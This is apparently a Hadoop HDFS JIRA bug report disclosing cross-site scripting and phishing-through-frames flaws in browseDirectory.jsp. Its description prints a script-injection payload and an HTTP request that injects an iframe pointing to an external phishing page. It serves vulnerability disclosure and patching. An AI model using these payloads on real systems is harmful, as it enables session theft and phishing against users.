Uploaded image for project: 'Hadoop HDFS'
  1. Hadoop HDFS
  2. HDFS-4901

Site Scripting and Phishing Through Frames in browseDirectory.jsp

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Resolved
    • Blocker
    • Resolution: Not A Problem
    • 1.2.1
    • None
    • security, webhdfs
    • None

    Description

      It is possible to steal or manipulate customer session and cookies, which might be used to impersonate a legitimate user,
      allowing the hacker to view or alter user records, and to perform transactions as that user.
      e.g.
      GET /browseDirectory.jsp? dir=%2Fhadoop'"/><script>alert(759)</script> &namenodeInfoPort=50070

      Also;

      Phishing Through Frames

      Try:
      GET /browseDirectory.jsp? dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
      &namenodeInfoPort=50070 HTTP/1.1
      Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
      Accept-Language: en-US
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;

      Attachments

        1. HDFS-4901_branch-1.2.patch
          4 kB
          Vivek Ganesan
        2. HDFS-4901.patch
          4 kB
          Vivek Ganesan
        3. HDFS-4901.patch.1
          4 kB
          Vivek Ganesan

        Issue Links

          Activity

            People

              vivganes Vivek Ganesan
              jeffreyr97 Jeffrey E Rodriguez
              Votes:
              0 Vote for this issue
              Watchers:
              7 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved:

                Time Tracking

                  Estimated:
                  Original Estimate - 24h
                  24h
                  Remaining:
                  Remaining Estimate - 0h
                  0h
                  Logged:
                  Time Spent - 24h
                  24h